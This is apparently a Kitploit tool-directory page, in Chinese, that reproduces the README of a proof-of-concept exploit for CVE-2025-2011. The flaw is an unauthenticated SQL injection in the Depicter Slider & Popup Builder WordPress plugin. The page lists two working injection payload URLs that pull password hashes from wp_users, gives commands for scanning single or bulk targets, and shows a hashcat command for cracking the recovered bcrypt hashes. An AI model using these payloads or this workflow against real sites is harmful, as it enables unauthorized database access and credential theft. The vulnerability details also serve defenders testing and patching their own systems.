Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-2011 — CVE-2025-2011 的漏洞利用程序 | Kitploit
工具/GitHubGitHub/x3rx3ssec/cve-2025-2011
密码破解漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubx3rx3ssec/cve-2025-2011

CVE-2025-2011

CVE-2025-2011 的漏洞利用程序

查看仓库
11310个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-2011 PoC

作者: X3RX3S 但自豪地被 Ash Wesker 剥离,这家伙用他的横幅对 GPT 了我的代码 ;) 看这里 ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 你甚至可以在“他”的代码里看到我的 handle -_-'

目的: 一个概念验证工具,用于测试针对 WordPress 站点的 SQL 注入漏洞(CVE-2025-2011)。
免责声明: 仅用于您拥有或已获得明确书面许可的系统。未经授权的测试是非法且不道德的。 Screenshot From 2025-11-02 19-44-16


关于漏洞 :)

  • WordPress 插件 Slider & Popup Builder by Depicter 在版本至 3.6.1(含)中存在通用 SQL 注入漏洞,漏洞通过 ‘s’ 参数触发,原因是对用户提供的参数转义不足,且现有 SQL 查询缺乏充分的准备。这使得未认证攻击者能够在已有查询中追加额外的 SQL 查询,从而从数据库中提取敏感信息。

功能

  • 两个 SQLi 载荷(通过 -p 1 或 -p 2 选择)
  • Bcrypt($2a$、$2b$、$2y$)哈希检测,包括 $wp$ 前缀变体
  • 按主机名保存结果:results_<hostname>.txt
  • 可选的 Hashcat 集成用于 bcrypt(-m 3200),带有提示
  • 支持单个 URL(-u)或通过文件(-f)指定多个目标

要求

  • Python 3.8+
  • pip 包:
    • requests
    • colorama

安装依赖:

pip install requests colorama

可选(用于破解):

  • 已安装 hashcat 并可在 PATH 中找到(默认词表为 /usr/share/wordlists/rockyou.txt)
  • 词表,例如 /usr/share/wordlists/rockyou.txt

使用方法

使脚本可执行(可选):

chmod +x CVE-2025-2011.py

单个目标(默认载荷 1):

python3 CVE-2025-2011.py -u https://example.com

单个目标(载荷 2):

python3 CVE-2025-2011.py -u https://example.com -p 2

从文件指定多个目标(每行一个 URL):

python3 CVE-2025-2011.py -f targets.txt

输出

对于每个测试的主机,脚本会保存一个结果文件:

results_<hostname>.txt

如果发现 bcrypt 哈希,它们会被保存到 hashes.txt,并提示您使用 Hashcat 破解。脚本使用的示例 Hashcat 命令:

hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt

注意:bcrypt 设计上速度较慢。破解可能需要很长时间,并需要 GPU。


载荷

  • 载荷 1(默认):
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
  • 载荷 2:
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x

法律与负责任使用

此工具仅供教育和防御目的使用。不要在未获得明确许可的系统上使用。作者和分发者不对滥用承担任何责任。在对不属于自己的目标进行测试前,请务必获得书面授权。


注意事项与调优

  • 如果您使用不同的词表,请更新脚本中的 run_hashcat 函数,指向您偏好的词表路径。
  • 如果未安装 Hashcat 或您不想破解哈希,请在提示时回答 N。
  • 您可以在脚本中调整超时和线程行为,以进行大规模扫描。

由……拼凑而成

  • X3RX3S
  • 灵感来源于负责任的安全研究工作流程及 Chocapikk(https://github.com/Chocapikk)
下载工具